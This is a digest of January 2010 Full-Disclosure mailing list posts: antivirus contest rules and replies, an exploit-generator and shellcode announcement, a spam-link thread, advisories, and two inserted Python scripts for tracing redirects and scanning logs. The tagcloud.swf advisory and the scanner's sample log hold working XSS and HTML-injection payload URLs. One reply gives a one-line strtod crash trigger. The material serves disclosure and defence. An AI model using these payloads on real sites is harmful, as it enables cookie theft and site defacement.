[Full-disclosure] iAWACS 2010 : Rules of the PWN2KILL contest
iAWACS 2010 : Rules of the PWN2KILL contest
http://www.esiea-recherche.eu/iawacs2010/

The PWN2KILL Contest aims at performing a comparative evaluation of commercial antivirus software against actual threats. An actual threat can be defined as any threat that is operationally viable.

The purpose is to show that given fixed actual malware threats, the different existing antivirus software are of unequal quality. While a few of them are able to proactively detect unknown malware using known malware techniques, most of them are just able to detect most of the known malware (not all of them). Moreover, the in-depth analysis of existing antivirus software shows that a significant number of malware techniques that have been published -- by hackers, malware writers, researchers in computer security and computer virology -- are still not taken into account by commercial antivirus products while those techniques indeed represent actual threats. Consequently, it is more than useful for the end user and the final consumer (since AV software are products that we buy) to know which antivirus are the least worst and which are the worst.

The contest board will be composed of a bailiff, of five professional journalists from the computer technical press and of three personalities from the scientific/hacking community renowned for their personal ethics and skills. Its role will be to record the test results, decide on their validity and elect the three most efficient attacks.

The contest will be based on the only admissible approach: the experiment and the attacker's view. The rules are very simple:

1.- A number of computers -- each of them with an antivirus installed -- will be available. The environment will be
  - Windows 7 (in a virtual machine for an easy reconfiguration purpose).
  - User mode (without privilege).
  - No connection to the Internet (to avoid ``external'' attacks or manipulation during the contest). However to enable truly network-based attacks (input and/or output data), it will be possible upon request to open temporarily an access to the Internet provided that no attack will be launched from the testing machine towards external systems.
  - Common applications installed (Microsoft suite, OpenOffice Suite, Pdf reader...). Any additional application can be added upon request or can be used through personal USB devices.
  - A printer will be available through the network (spec data available upon request).

2.- Each participant will come with his (malware) code(s) to test against the antivirus software. He can perform any action that a normal user can do (including rebooting the computer, closing a session, using USB devices...). In case of ``proactive'' warning from the operating system or from any application, the user is free to follow them or not. A user does not have to be an expert in computers in order to evaluate and interpret technical warnings that sometimes refer to normal behaviours. As an example, warnings like ``an application is attempting to become resident. Do you allow it?'' have no meaning for a grandmother using a computer. She is free to allow it!

3.- In order to make a comparative and fair testing, any code must be tested against ALL antivirus selected for the challenge. The test will consist in two steps: first the code(s) will be scanned (on demand analysis) then used as intended (on-access analysis).

4.- Any participant will have first to announce what effect/attack he intends to perform. The board will decide whether this attack is admissible or not. An admissible attack is an attack which affects availability, integrity and/or confidentiality of the system and/or the data (data system, user data...).

5.- Any participant will have to write a short technical summary of his attack(s) which will be published on the iAWACS website. He will have to present his attack(s) during the contest debriefing. A copy of his code will be given to the organizers of the challenge.

For fairness purposes, no participants working for any AV company or any company sharing common interest with AV companies, will be allowed to participate. Any participant will thus have to sign an assessment form confirming he is not working for such companies.

The organizers of iAWACS 2010 and of the PWN2KILL challenge have selected the following antivirus software:
-- Avast
-- AVG
-- Avira
-- BitDefender
-- DrWeb
-- FSecure
-- GData
-- Kaspersky
-- McAfee
-- Microsoft AV
-- NOD 32
-- Norton Symantec
-- Trend Micro

Only commercial licences will be tested -- in other words they will be anonymously bought in public stores/website (no demo or free version). The antivirus will be updated right before the
[Full-disclosure] Download and LoadLibrary shellcode released
For those interested in shellcode: download and LoadLibrary shellcode has some benefits over download execute shellcode. Read more about it here: http://skypher.com/index.php/2010/01/11/download-and-loadlibrary-shellcode-released/ Cheers, SkyLined Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re [2]: iiscan results - a closer look
Good day all,

Give a few keys from me:
37e65b9f6a61bc3f
e2dcfc0b249e4a73
de744886da78d1ac
32bd48ed74ef30e5
858c1d2b83b2ec06

On Fri, 8 Jan 2010 16:42:33 -0400, d...@sucuri.net wrote:

I played with it a little yesterday and posted my thoughts (as well as a summary of their whole scan) at: http://blog.sucuri.net/2010/01/closer-look-at-iiscan.html

It is a nice tool with some good checks looking for SQL, XSS, etc... I just think they didn't look deep enough in my site to check more stuff...

--dd

On Thu, Jan 7, 2010 at 11:58 AM, Robin Sage robin.s...@rocketmail.com wrote:

If anyone has any more invite codes please send one to me. I tried the ones posted and they were not functional. I also emailed support and never received a response. Has anyone compared this to AppScan, WebInspect, Sentinel, Qualys or Acunetix? How many trials do you get per invite code? Just 1 app? Thanks!

From: Jardel Weyrich jweyr...@gmail.com
To: p8x l...@p8x.net
Cc: full-disclosure@lists.grok.org.uk
Sent: Thu, January 7, 2010 9:33:07 AM
Subject: Re: [Full-disclosure] iiscan results

It's probably trying to get different results/responses by changing the values of some request headers. The most common scenario, as far as I've seen, and as oddly as it might sound, is the User-Agent and HTTP minor version. A more verbose logging strategy would demystify. Or maybe Vincent?

--
Best regards!
Vladimir Vorontsov, security expert.
ONsec: turn on security
Re: [Full-disclosure] iAWACS 2010 : Rules of the PWN2KILL contest
Hi,

I see a lot of 'what the participants have to do' and 'what the participants have to give away', but I don't see anywhere what the winner/s of the contest would win in all this. Where can I find that information, in order to decide if it is worth participating or not?

Thanks in advance.

Cheers,
sergio

On Jan 11, 2010, at 11:05 AM, Anthony Desnos wrote:

iAWACS 2010 : Rules of the PWN2KILL contest
http://www.esiea-recherche.eu/iawacs2010/

The PWN2KILL Contest aims at performing a comparative evaluation of commercial antivirus software against actual threats. An actual threat can be defined as any threat that is operationally viable.

The purpose is to show that given fixed actual malware threats, the different existing antivirus software are of unequal quality. While a few of them are able to proactively detect unknown malware using known malware techniques, most of them are just able to detect most of the known malware (not all of them). Moreover, the in-depth analysis of existing antivirus software shows that a significant number of malware techniques that have been published -- by hackers, malware writers, researchers in computer security and computer virology -- are still not taken into account by commercial antivirus products while those techniques indeed represent actual threats. Consequently, it is more than useful for the end user and the final consumer (since AV software are products that we buy) to know which antivirus are the least worst and which are the worst.

The contest board will be composed of a bailiff, of five professional journalists from the computer technical press and of three personalities from the scientific/hacking community renowned for their personal ethics and skills. Its role will be to record the test results, decide on their validity and elect the three most efficient attacks.

The contest will be based on the only admissible approach: the experiment and the attacker's view. The rules are very simple:

1.- A number of computers -- each of them with an antivirus installed -- will be available. The environment will be
  - Windows 7 (in a virtual machine for an easy reconfiguration purpose).
  - User mode (without privilege).
  - No connection to the Internet (to avoid ``external'' attacks or manipulation during the contest). However to enable truly network-based attacks (input and/or output data), it will be possible upon request to open temporarily an access to the Internet provided that no attack will be launched from the testing machine towards external systems.
  - Common applications installed (Microsoft suite, OpenOffice Suite, Pdf reader...). Any additional application can be added upon request or can be used through personal USB devices.
  - A printer will be available through the network (spec data available upon request).

2.- Each participant will come with his (malware) code(s) to test against the antivirus software. He can perform any action that a normal user can do (including rebooting the computer, closing a session, using USB devices...). In case of ``proactive'' warning from the operating system or from any application, the user is free to follow them or not. A user does not have to be an expert in computers in order to evaluate and interpret technical warnings that sometimes refer to normal behaviours. As an example, warnings like ``an application is attempting to become resident. Do you allow it?'' have no meaning for a grandmother using a computer. She is free to allow it!

3.- In order to make a comparative and fair testing, any code must be tested against ALL antivirus selected for the challenge. The test will consist in two steps: first the code(s) will be scanned (on demand analysis) then used as intended (on-access analysis).

4.- Any participant will have first to announce what effect/attack he intends to perform. The board will decide whether this attack is admissible or not. An admissible attack is an attack which affects availability, integrity and/or confidentiality of the system and/or the data (data system, user data...).

5.- Any participant will have to write a short technical summary of his attack(s) which will be published on the iAWACS website. He will have to present his attack(s) during the contest debriefing. A copy of his code will be given to the organizers of the challenge.

For fairness purposes, no participants working for any AV company or any company sharing common interest with AV companies, will be allowed to participate. Any participant will thus have to sign an assessment form confirming he is not working for such
Re: [Full-disclosure] iAWACS 2010 : Rules of the PWN2KILL contest
Hi Anthony,

AD> The PWN2KILL Contest aims at performing a comparative evaluation of commercial antivirus software against actual threats.
AD> An actual threat can be defined as any threat that is operationally viable.

The challenge is rather large and the goals not really clear, based on the above, pwn includes dropping custom malware and checking whether it is detected. Installing a rootkit is counted as pwned? You do not include the hardware details of the machine, for instance if there are CPU virtualization features supported?

Apparently proactive detection rules can simply be ignored based on the assumption a grandma will click yes anyways (below). I am not sure though a grandma really provides the incentive to create custom code in real life ;)

Will this really prove anything? From my experience all and every anti-virus software can be pwned (as per your definition) with custom unknown code. What is left are the Windows 7 ACLs which you need to bypass also, these can be more of a problem than bypassing AV.

I am with Sergio, what is there to gain for somebody that spends x weeks on targets? Apart from having their name displayed on your website, that might not be enough for anybody ;)

Regards,
Thierry

AD> As an example, warnings like ``an application is attempting to become resident. Do you allow it?'' have no meaning for a grandmother using a computer. She is free to allow it!

AD> 2.- Each participant will come with his (malware) code(s) to test against the antivirus software. He can perform any action that a normal user can do (including rebooting the computer, closing a session, using USB devices...). In case of ``proactive'' warning from the operating system or from any application, the user is free to follow them or not. A user does not have to be an expert in computers in order to evaluate and interpret technical warnings that sometimes refer to normal behaviours. As an example, warnings like ``an application is attempting to become resident. Do you allow it?'' have no meaning for a grandmother using a computer. She is free to allow it!
AD>
AD> 3.- In order to make a comparative and fair testing, any code must be tested against ALL antivirus selected for the challenge. The test will consist in two steps: first the code(s) will be scanned (on demand analysis) then used as intended (on-access analysis).
AD>
AD> 4.- Any participant will have first to announce what effect/attack he intends to perform. The board will decide whether this attack is admissible or not. An admissible attack is an attack which affects availability, integrity and/or confidentiality of the system and/or the data (data system, user data...).
AD>
AD> 5.- Any participant will have to write a short technical summary of his attack(s) which will be published on the iAWACS website. He will have to present his attack(s) during the contest debriefing. A copy of his code will be given to the organizers of the challenge.
AD>
AD> For fairness purposes, no participants working for any AV company or any company sharing common interest with AV companies, will be allowed to participate. Any participant will thus have to sign an assessment form confirming he is not working for such companies.
AD>
AD> The organizers of iAWACS 2010 and of the PWN2KILL challenge have selected the following antivirus software:
AD> -- Avast
AD> -- AVG
AD> -- Avira
AD> -- BitDefender
AD> -- DrWeb
AD> -- FSecure
AD> -- GData
AD> -- Kaspersky
AD> -- McAfee
AD> -- Microsoft AV
AD> -- NOD 32
AD> -- Norton Symantec
AD> -- Trend Micro
AD>
AD> Only commercial licences will be tested -- in other words they will be anonymously bought in public stores/website (no demo or free version). The antivirus will be updated right before the beginning of the challenge.
AD>
AD> The organizers will publish a technical summary of the results once validated by the contest board. No communication will be done directly towards the AV vendors. Only a technical communication and press conference will be organized during the iAWACS event. A technical summary will be available on the iAWACS website. The complete data and codes collected will be communicated only to the French CERT-A for analysis and feedbacks. No code will be either published or distributed.
AD>
AD> Any participant is free to communicate later on about his test/code/attack performed during the contest. In this case, iAWACS organizers are not responsible for that communication.
[Full-disclosure] a:Schwachstelle: Durzosploit v0.1 alpha
Hi all readers,

Just releasing a very small tool I wrote called Durzosploit. Durzosploit is a javascript exploits generator framework that works through the console. The goal of this project is to quickly and easily generate working exploits for cross-site scripting vulnerabilities in popular web applications or web sites. Please note that Durzosploit does not find browser vulnerabilities, it is only a framework containing exploits you can use.

More info can be found here: http://engineeringforfun.com/wiki/index.php/Durzosploit_Introduction

You can get it through the SVN: http://engineeringforfun.com/wiki/index.php/Durzosploit_SVN
[Full-disclosure] Surge in Skype Spam activity
Surge in Skype Spam activity.
http://tinyurl.com/yc38trm
Re: [Full-disclosure] Surge in Skype Spam activity
h, shall I click a tinyurl coming from a f-d poster? n/n, pick one

this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it.

2010/1/11 Chen Levkovich chen.levkov...@securityextension.com

Surge in Skype Spam activity.
http://tinyurl.com/yc38trm
Re: [Full-disclosure] Surge in Skype Spam activity
It’s harmless, he’s just blowing his own company’s horn. Speaking of spam…

h, shall I click a tinyurl coming from a f-d poster? n/n, pick one

this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it.

2010/1/11 Chen Levkovich chen.levkov...@securityextension.com

Surge in Skype Spam activity.
http://tinyurl.com/yc38trm
Re: [Full-disclosure] Surge in Skype Spam activity
Hah, I see what you did there.

Sent from my iPhone

On 11 Jan 2010, at 13:43, Larry Seltzer la...@larryseltzer.com wrote:

It’s harmless, he’s just blowing his own company’s horn. Speaking of spam…

h, shall I click a tinyurl coming from a f-d poster? n/n, pick one

this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it.

2010/1/11 Chen Levkovich chen.levkov...@securityextension.com

Surge in Skype Spam activity.
http://tinyurl.com/yc38trm
Re: [Full-disclosure] Surge in Skype Spam activity
I did but I use Firefox + NoScript in a vm for such things. Admittedly still risky especially if the site peddles a certain kind of porn and is on a watch list. I know I should really chain proxy or TOR to such links. Unfortunately this occurred to me after clicking the link.

There is not much to see here, it's a new site with next to no content. There are a couple of examples of the typical kind of spam one gets via email: Viagra and cheap software. It has a blog format. I believe the guy/gal is just promoting his/her site.

There is script on the page: jQuery 1.2.6 - New Wave Javascript drupal.js,v 1.41.2.4 2009/07/21 as well as google analytics stuff.

To my admittedly limited knowledge the site is benign

mrx

dramacrat wrote:

h, shall I click a tinyurl coming from a f-d poster? n/n, pick one

this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it.

2010/1/11 Chen Levkovich chen.levkov...@securityextension.com

Surge in Skype Spam activity.
http://tinyurl.com/yc38trm

--
Mankind's systems are white sticks tapping walls.
Thanks Roy
http://www.propergander.org.uk
Re: [Full-disclosure] Surge in Skype Spam activity
dramacrat wrote:

h, shall I click a tinyurl coming from a f-d poster? n/n, pick one

this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it.

Whilst I agree entirely with these sentiments, at least tinyurl has a (I thought well-known) preview option that does not require a browser plugin -- simply prefix the tinyurl.com domain name with the preview sub-domain and instead of auto-redirecting you tinyurl will tell you the redirection URL.

Also, is using a commandline URL grabber like curl or wget to see the 301 redirect target really that difficult for a 1337 F-D hax0r such as yourself?

FWIW, the target URL is:

http://securityextension.com/securitylab

which really doesn't seem worth the effort of shortening...

Regards,
Nick FitzGerald
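The two checks described in the message above (the preview sub-domain, and reading the redirect target from the response headers without visiting it), written out in Python as an added example that is not part of the original post. The hosts under `.example` and the `SAMPLE_RESPONSES` table are constructed stand-ins so the tracing logic runs offline; `head_request` is the live fetcher.

```python
import http.client
from urllib.parse import urljoin, urlsplit, urlunsplit

REDIRECT_CODES = {301, 302, 303, 307, 308}


def tinyurl_preview(url):
    """Rewrite a tinyurl.com link to the preview sub-domain form."""
    parts = urlsplit(url)
    if (parts.hostname or "").lower() in ("tinyurl.com", "www.tinyurl.com"):
        return urlunsplit((parts.scheme, "preview.tinyurl.com",
                           parts.path, parts.query, ""))
    return url


def head_request(url, timeout=5.0):
    """Send one HEAD request; return (status, Location header or None).

    http.client does not follow redirects by itself, so only the response
    headers of the URL that was asked for are retrieved.
    """
    parts = urlsplit(url)
    conn_cls = (http.client.HTTPSConnection if parts.scheme == "https"
                else http.client.HTTPConnection)
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    try:
        target = (parts.path or "/") + ("?" + parts.query if parts.query else "")
        conn.request("HEAD", target)
        response = conn.getresponse()
        return response.status, response.getheader("Location")
    finally:
        conn.close()


def trace_redirects(url, fetch=head_request, max_hops=5):
    """Walk a redirect chain with header-only requests.

    Returns (chain, note): chain is a list of (status, url) per hop, note is
    "final", "loop", "hop limit" or "non-http target: <url>".
    """
    chain, seen, current = [], set(), url
    while True:
        if urlsplit(current).scheme not in ("http", "https"):
            return chain, "non-http target: " + current
        if current in seen:
            return chain, "loop"
        if len(chain) >= max_hops:
            return chain, "hop limit"
        seen.add(current)
        status, location = fetch(current)
        chain.append((status, current))
        if status not in REDIRECT_CODES or not location:
            return chain, "final"
        # Location may be relative; resolve it against the URL just requested.
        current = urljoin(current, location)


# Constructed responses standing in for real servers (offline demo only).
SAMPLE_RESPONSES = {
    "http://short.example/abc": (301, "http://landing.example/promo"),
    "http://landing.example/promo": (302, "/securitylab"),
    "http://landing.example/securitylab": (200, None),
    "http://short.example/loop": (302, "http://short.example/loop"),
    "http://short.example/ftp": (301, "ftp://files.example/x"),
}


def sample_fetch(url):
    """Offline replacement for head_request, backed by SAMPLE_RESPONSES."""
    return SAMPLE_RESPONSES[url]


if __name__ == "__main__":
    print(tinyurl_preview("http://tinyurl.com/yc38trm"))
    for start in ("http://short.example/abc", "http://short.example/loop"):
        print(trace_redirects(start, fetch=sample_fetch))
```

Calling `trace_redirects(url)` without the `fetch` argument uses `head_request` against the real host.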
Re: [Full-disclosure] Surge in Skype Spam activity
On Monday 11 January 2010 14:32:06 dramacrat wrote:

h, shall I click a tinyurl coming from a f-d poster? n/n, pick one

this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it.

2010/1/11 Chen Levkovich chen.levkov...@securityextension.com

Surge in Skype Spam activity.
http://tinyurl.com/yc38trm

I am not a security expert, but I suppose that when you don't trust the sender the security countermeasures you have to take while opening a shortened url are *obviously* the same as opening a clean one.

Stanza
Re: [Full-disclosure] Surge in Skype Spam activity
Hello all,

Every long journey begins with a small step….

As requested, with full URL

Chen

http://www.securityextension.com/securitylab

From: Larry Seltzer [mailto:la...@larryseltzer.com]
Sent: Monday, January 11, 2010 3:44 PM
To: dramacrat; Chen Levkovich
Cc: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Surge in Skype Spam activity

It’s harmless, he’s just blowing his own company’s horn. Speaking of spam…

h, shall I click a tinyurl coming from a f-d poster? n/n, pick one

this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it.

2010/1/11 Chen Levkovich chen.levkov...@securityextension.com

Surge in Skype Spam activity.
http://tinyurl.com/yc38trm
Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
On Thu, Jan 7, 2010 at 7:20 PM, Maksymilian Arciemowicz c...@securityreason.com wrote:

[ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

I tested doing

printf %1.262159f 1.1

in a shell login on 10.4.11 and it took out my session. I imagine this means 10.4.11 is vulnerable as well no? Tiger is still very popular in enterprise environments that are slow to upgrade.

--
Joshua Levitsky, MCSE, CISSP
http://www.jnuxhosting.net
http://www.jnux.net
http://blog.joshie.com/
[5957 F27C 9C71 E9A7 274A 0447 C9B9 75A4 9B41 D4D1]
Re: [Full-disclosure] Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection
It's spelled synergy.

---
Jef

Jef Poskanzer j...@mail.acme.com http://acme.com/jef/
[Full-disclosure] XSS vulnerabilities in 34 millions flash files
Hello Full-Disclosure!

Yesterday I wrote the article XSS vulnerabilities in 34 millions flash files (http://websecurity.com.ua/3842/), and here is the English version of it.

In December in my article XSS vulnerabilities in 8 millions flash files (http://websecurity.com.ua/3789/) I wrote that there are up to 3400 of flashes tagcloud.swf in Internet which are potentially vulnerable to XSS attacks. Taking into account that people mostly didn't pay attention in the previous article to my mentioning of another 34 millions of vulnerable flashes, I decided to write another article about it.

File tagcloud.swf was developed by the author of the plugin WP-Cumulus for WordPress (http://websecurity.com.ua/3665/) and it's delivered with this plugin for WordPress, and also with other plugins, particularly Joomulus (http://websecurity.com.ua/3801/) and JVClouds3D (http://websecurity.com.ua/3839/) for Joomla and Blogumus (http://websecurity.com.ua/3843/) for Blogger. Taking into account the prevalence of this flash file, I'll note that it's the most widespread flash file in Internet with an XSS vulnerability.

Prevalence of the problem.

There are a lot of vulnerable tagcloud.swf files in Internet (according to Google):

http://www.google.com.ua/search?q=filetype:swf+inurl:tagcloud.swf

If at 18.12.2009 there were about 3400 results, then now there are about 3250 results. And these are only those flash files which were indexed by Google, and actually there can be much more of them.

So there are about 32,5 millions of sites with file tagcloud.swf which are vulnerable to XSS and HTML Injection attacks.

Among them there are about 273000 gov-sites (http://www.google.com.ua/search?q=filetype:swf+inurl:tagcloud.swf+inurl:gov&filter=0) which are vulnerable to XSS and HTML Injection attacks.

Vulnerabilities in swf-file.

File tagcloud.swf is vulnerable to XSS and HTML Injection attacks via parameter tagcloud.

XSS:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS.

HTML Injection:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

HTML Injection attack can be conducted particularly on those flash files which have protection (in flash files or via WAF) against javascript and vbscript URI in parameter tagcloud.

Examples of vulnerable sites.

I gave examples of vulnerable sites with this swf-file in the post XSS vulnerabilities in tagcloud.swf at gov and gov.ua (http://websecurity.com.ua/3835/).

So for flash developers it's better to attend to the security of their flash files. And for owners of sites with vulnerable flashes (particularly tagcloud.swf) it's needed either to fix them by themselves, or to turn to their developers.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
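For site owners, a log check for the request pattern described in the advisory above, as an added example that is not part of the original post. It decodes the `tagcloud` parameter of requests for tagcloud.swf and reports links with a javascript/vbscript URI (the XSS case) or an off-site target (the HTML Injection case that the post says passes script-URI filters). The log lines are constructed, and `www.example.org` and `elsewhere.example` are placeholder host names.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

SCRIPT_SCHEMES = ("javascript", "vbscript")
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/\d\.\d"')


class _HrefCollector(HTMLParser):
    """Collect href values of <a> tags in the injected tag-cloud markup."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)


def _is_offsite(href, site_host):
    """True when an absolute or scheme-relative link leaves site_host."""
    target = "http:" + href if href.startswith("//") else href
    host = (urlsplit(target).hostname or "").lower()
    return bool(host) and host != site_host and not host.endswith("." + site_host)


def classify_request(target, site_host):
    """Return [(kind, href)] findings for one request target, [] if clean."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("tagcloud.swf"):
        return []
    findings = []
    # parse_qs undoes the %XX and '+' encoding seen in the log.
    for markup in parse_qs(parts.query).get("tagcloud", []):
        collector = _HrefCollector()
        collector.feed(markup)
        for href in collector.hrefs:
            # Whitespace/control characters inside a scheme name are a
            # common filter-evasion trick, so drop them before comparing.
            cleaned = re.sub(r"[\x00-\x20]", "", href).lower()
            scheme = cleaned.split(":", 1)[0] if ":" in cleaned else ""
            if scheme in SCRIPT_SCHEMES:
                findings.append(("xss", href))
            elif (scheme in ("http", "https") or cleaned.startswith("//")) \
                    and _is_offsite(cleaned, site_host):
                findings.append(("html-injection", href))
    return findings


def scan_log(lines, site_host):
    """Scan access-log lines; return [(line_number, kind, href)]."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            for kind, href in classify_request(match.group(1), site_host):
                hits.append((number, kind, href))
    return hits


# Constructed access-log lines (combined log format) for the demo.
SAMPLE_LOG = """
203.0.113.5 - - [11/Jan/2010:10:00:00 +0000] "GET /tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E HTTP/1.1" 200 34211
203.0.113.9 - - [11/Jan/2010:10:01:00 +0000] "GET /tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://elsewhere.example/'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E HTTP/1.1" 200 34211
198.51.100.7 - - [11/Jan/2010:10:02:00 +0000] "GET /tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://www.example.org/tag/security'+style='font-size:+12pt'%3Esecurity%3C/a%3E%3C/tags%3E HTTP/1.1" 200 34211
198.51.100.7 - - [11/Jan/2010:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 512
""".strip().splitlines()

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, "www.example.org"):
        print(hit)
```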
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter
John Cartwright jo...@grok.org.uk

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia.

- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in either the message subject or body for details.

- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/.

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list.

- Posting Guidelines -

The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclos...@lists.grok.org.uk. Do not send subscription/unsubscription mails to this address, use the -request address mentioned above.

- Charter Additions/Changes -

The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a consensus has been reached.
Re: [Full-disclosure] iAWACS 2010 : Rules of the PWN2KILL contest
On Mon, 11 Jan 2010 12:45:33 +0100, Thierry Zoller said:

Apparently proactive detection rules can simply be ignored based on the assumption a grandma will click yes anyways.(below) I am not sure though a grandma really provides the incentive to create custom code in real life ;)

Unfortunately, out in the real world, grannies cause botnets. And botnets make money. So botnet authors have plenty of incentive to create codes.

Of course, that doesn't mean anybody will feel an incentive to create custom code for this contest...
Re: [Full-disclosure] Surge in Skype Spam activity
http://kiserai.net/turl.pl

Tiny URL decoder. I was going to send the TinyURL decoder in a TinyURL, but I’m just not that motivated atm. ☺

t

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Larry Seltzer
Sent: Monday, January 11, 2010 5:44 AM
To: dramacrat; Chen Levkovich
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Surge in Skype Spam activity

It’s harmless, he’s just blowing his own company’s horn.

Speaking of spam… h, shall I click a tinyurl coming from a f-d poster? n/n, pick one

this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it.

2010/1/11 Chen Levkovich chen.levkov...@securityextension.com

Surge in Skype Spam activity.
http://tinyurl.com/yc38trm
[Full-disclosure] [ MDVSA-2009:293-1 ] squidGuard
Mandriva Linux Security Advisory MDVSA-2009:293-1
http://www.mandriva.com/security/

Package : squidGuard
Date: January 11, 2010
Affected: 2008.0

Problem Description:

Multiple vulnerabilities have been found and corrected in squidGuard:

Buffer overflow in sgLog.c in squidGuard 1.3 and 1.4 allows remote attackers to cause a denial of service (application hang or loss of blocking functionality) via a long URL with many / (slash) characters, related to emergency mode. (CVE-2009-3700).

Multiple buffer overflows in squidGuard 1.4 allow remote attackers to bypass intended URL blocking via a long URL, related to (1) the relationship between a certain buffer size in squidGuard and a certain buffer size in Squid and (2) a redirect URL that contains information about the originally requested URL (CVE-2009-3826).

squidGuard was upgraded to 1.2.1 for MNF2/CS3/CS4 with additional upstream security and bug fixes patches applied.

This update fixes these vulnerabilities.

Update:

Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3700
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3826

Updated Packages:

Mandriva Linux 2008.0:
a26b9b6c562df50e5bdc2085d64afee0 2008.0/i586/squidGuard-1.2.0-14.1mdv2008.0.i586.rpm
2bc79ed1f73af0b5cb7c82b7f2df78f7 2008.0/SRPMS/squidGuard-1.2.0-14.1mdv2008.0.src.rpm

Mandriva Linux 2008.0/X86_64:
ee84967352ebe00624076d19e17ee1a3 2008.0/x86_64/squidGuard-1.2.0-14.1mdv2008.0.x86_64.rpm
2bc79ed1f73af0b5cb7c82b7f2df78f7 2008.0/SRPMS/squidGuard-1.2.0-14.1mdv2008.0.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] [ MDVSA-2009:227-1 ] freeradius
Mandriva Linux Security Advisory MDVSA-2009:227-1
http://www.mandriva.com/security/

Package : freeradius
Date: January 11, 2010
Affected: 2008.0

Problem Description:

A vulnerability has been found and corrected in freeradius:

